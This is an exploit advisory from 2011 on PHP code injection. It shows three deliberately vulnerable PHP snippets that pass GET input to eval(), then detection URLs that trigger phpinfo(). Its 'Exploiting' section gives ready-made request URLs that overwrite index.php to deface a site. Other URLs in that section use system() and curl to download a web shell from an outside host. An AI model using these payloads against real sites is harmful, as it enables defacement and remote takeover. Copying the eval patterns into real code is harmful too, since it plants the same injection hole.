|===============================================================================================|
|----->	[ID]		:	[SSB00000]							|
|----->	[Title]		:	[PoC of PHP Code Injection]					|
|----->	[Criticality]	:	[High]								|
|----->	[Email]		:	[ssbostan@gmail.com]						|
|----->	[Date]		:	[18/07/2011]							|
|===============================================================================================|

######################################################################################### BOF ###
### Introduction
+
+ PCI is a type of vulnerability in php language and allows attacker to inject php codes.
+ two types of PCI attacks are:
+ 		1- Inject PHP code in PHP Code (if use eval() function)
+		2- Inject Code in used function area (if use another functions)
+
+ in the first method you can use each of php functions for attacking.
+
+ for example:
+	you can use include(), system() functions or another in eval() function.
+
+ but
+
+ in the second method you can just use orders that in used function area.
+
+ for example:
+	if source used system() function you can just execute command such as RCE method.
+	or
+	if source used include() function you can just include pages such as RFI method.
+
+ Attention:
+	because all methods of second method have specified name, the first method is PCI..!!!
+
+
+
+
### Vulnerable source codes
+
+ We have three sample codes for proof of concept.
+
+ PoC1 (5 line):
+
+ <?php
+ $how=$_GET['how'];
+ $how=stripslashes($how);
+ eval($how);
+ ?>
+
+ PoC2 (6 line):
+
+ <?php
+ $how=$_GET['how'];
+ $how=preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$how','ob_start();eval("$how[2];");$return=ob_get_contents();ob_end_clean();return $return;'),$how);
+ $how=preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$how','ob_start();eval("print $how[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$how);
+ echo $how;
+ ?>
+
+ PoC3 (5 line):
+
+ <?php
+ $how=$_GET['how'];
+ $how=stripslashes($how);
+ eval('?>'.$how);
+ ?>
+
+
+
+
### Detection
+
+ PoC1:
+ http://website.com/page.php?how=phpinfo();
+
+ PoC2:
+ http://website.com/page.php?how=<? phpinfo(); ?>
+
+ PoC3:
+ http://website.com/page.php?how=<? phpinfo();
+
+ results: show server phpinfo page.
+
+
+
+
### Exploiting
+
+ Create deface page:
+
+ 	http://website.com/page.php?how=$def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def);
+ or
+ 	http://website.com/page.php?how=<?php $def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def); ?>
+ or
+ 	http://website.com/page.php?how=<?php $def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def);
+
+ Create shell:
+
+ 	http://website.com/page.php?how=system("curl http://shellcode.com/shell.txt -o shell.php");
+ or
+ 	http://website.com/page.php?how=<?php system("curl http://shellcode.com/shell.txt -o shell.php"); ?>
+ or
+ 	http://website.com/page.php?how=<?php system("curl http://shellcode.com/shell.txt -o shell.php");
+
+
+
+
######################################################################################### EOF ###